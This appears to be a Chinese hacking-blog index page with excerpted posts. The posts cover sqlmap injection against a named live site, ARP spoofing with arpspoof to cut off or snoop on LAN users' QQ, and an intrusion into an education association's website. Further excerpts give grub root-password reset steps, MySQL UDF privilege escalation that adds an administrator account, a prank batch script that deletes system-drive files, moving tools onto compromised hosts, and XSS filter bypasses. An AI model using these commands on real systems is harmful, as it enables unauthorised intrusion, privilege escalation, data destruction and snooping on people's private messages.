hack那些事
文章平均质量分 72
中国好利鹏
从今天开始要写博客了!!1加油
展开
-
sqlmap实战
昨天看sqlmap教程的时候,羽翼给我们提供了一个测试站点http://www.slibrary.com/link.php?id=321。我就想了想,都好几年了,这个站肯定修复好了。然后测试了一下,http://www.slibrary.com/link.php?id=321‘http://www.slibrary.com/link.php?id=321 and 1=1ht原创 2014-10-31 21:11:10 · 1707 阅读 · 1 评论 -
看kali教程的一些总结(i春秋上的kali吧教程)
windows 雨滴 美化局域网 断网攻击 arp攻击 arpspoof -i 网卡 -t 目标ip 网关 查看局域网当中的ip Fping -asg 网段获取内网妹子的qq arp欺骗 : 目标的IP流量经过我的网卡,从网关出去arp断网 :没有从网关出去进行IP流量转发echo 1 > /proc/sys/n原创 2015-11-22 14:00:50 · 5144 阅读 · 1 评论 -
对安徽省高等学院计算机教育研究会的一次简单渗透。
测试时间:2015年7月21日 首先,自我介绍一下,我是ss,属于合肥学院,信息安全小组的一名成员。这次测试真的是无意的,,,仅仅是因为在等待下载东西的时候,随便看看安排表。结果发现了该站点的漏洞。下面直接开始。 为什么会搞这个站点?因为新闻动态里面有通知,我们学校安排我去参加培训,我需要看时间安排。 然后呢?后台管理,,,居然有人把它直接放到了首页,,,(ps:我反正是醉了,明显是给黑客原创 2015-07-22 07:36:47 · 1396 阅读 · 0 评论 -
关于工大讲座的一次收获
2015年7月29日, 我们四个人去了工大。演讲者是 珠海国测软件公司的高级工程师。据老师说,他叫宋磊,本科是在科大读的。(每次去听演讲,有些人总会说,他是科大的,或者他是清华的,,,好像科大和清华的就比其他人高一等似的,学校只是一个平台,是否是人才,大多数情况下是自己努力,只不过名校的比例大一些罢了,英雄真的和学校有很大关系吗?呵呵)。。。宋磊前辈,看上去好年轻。第一眼看上去,就知道他是很厉害的原创 2015-07-30 14:46:19 · 678 阅读 · 0 评论 -
破解linux root 密码的猥琐思路!!
第一部分:如何破解linux root密码。Linux安装完毕后会有一个linux root用户。那么如何在不知道密码的情况下修改掉linux root用户的密码呢?方法如下:1. 在grub引导界面中按“e”进入grub的编辑模式。2. 编辑模式下选择第二项,即:“kernel /vmlinuz-2.4.20-8 ro root=LABEL=/”。然后再按“e”编辑此项。3. 在后面加上“ si转载 2015-06-08 22:00:10 · 3142 阅读 · 0 评论 -
wireshark数据包分析实战 总结
网上基本资料: http://openmaniak.com/cn/wireshark.php个人读书残留:一、路由:3层 FF:FF:FF:FF:FF:FF交换:2层 一般为最大ip地址广播域:广播数据能够到达的区域(不经过路由器)ctrl + F -> ctrl + N/B 查找ctrl + M -> shift原创 2015-06-04 15:11:08 · 1727 阅读 · 0 评论 -
一些恶搞的bat小脚本
关机脚本@echo offshutdown -s -t 0重启脚本@echo offshutdown -r -t 0唬人的格式化脚本@echo offcolor 4f taskkill /im explorer.exe /fecho 删除C盘所有文件...... del /f /s /q "%systemdrive%\*.tm原创 2015-06-11 18:01:00 · 106175 阅读 · 18 评论 -
udf提权的一次学习
udf提权。利用条件:root权限的mysql账号密码。提权方法:具体语句如下: create function cmdshell returns string soname ‘udf.dll’; select cmdshell(’net user iis_user 123 /add’); select cmdshell(’net localgroup administrators原创 2015-03-17 00:28:14 · 2656 阅读 · 0 评论 -
服务器与客户机之间传文件的几种小方法
收集于习科的各位大菊苣当搞到一台肉鸡的时候,想向里面传点工具,,,遇到了困难,,,但是有菊苣。。。1、mstsc,在高级选项里面,有个本地磁盘映射。可以进行复制。据说大文件不能复制,,,适合于小文件之间的传输2、在本地搭建一个ftp服务器,从主机里面搞呗3、hfs:HFS,它是一种上传文件的软件。 专为个人用户所设计的 HTTP 档案系统 - Http File Server,原创 2015-03-18 21:51:32 · 1762 阅读 · 0 评论 -
阜阳师范学院网盘的一次上传漏洞经历
某一天,红颜在群里发了一个链接。。。 http://wd.fync.edu.cn/%E5%AE%89%E8%A3%85%E8%AF%B4%E6%98%8E%5Cwww.txt 然后我打开链接。。。。 当时自己太懒了。。。没兴趣搞这个。。。。 后来过了几个小时。。。 风炫也进去玩了。。。。 然后俩人开始扯淡了。。。 看着他们在群里扯淡,我心里直痒痒,,,于是从B站原创 2015-03-03 20:09:37 · 1530 阅读 · 1 评论 -
sqlmap使用总结
这几日,研究了一些sqlmap工具的使用。原创 2014-10-31 19:44:52 · 7964 阅读 · 0 评论 -
xss 的一些总结 (丘永华的书)
反射型 XSS通常出现在网站的搜索栏,用户登入口等,常用来窃取客户端Cookies进行钓鱼欺骗。持久性XSS一般在网站的留言、评论、博客日志等交互处,恶意脚本被存储到客户端或者服务器的数据库中XSS Cheat sheethttp://ha.ckers.org/xss.html二、绕过XSS-Filter 1、利用 2、利用HTM原创 2015-11-27 11:32:19 · 745 阅读 · 0 评论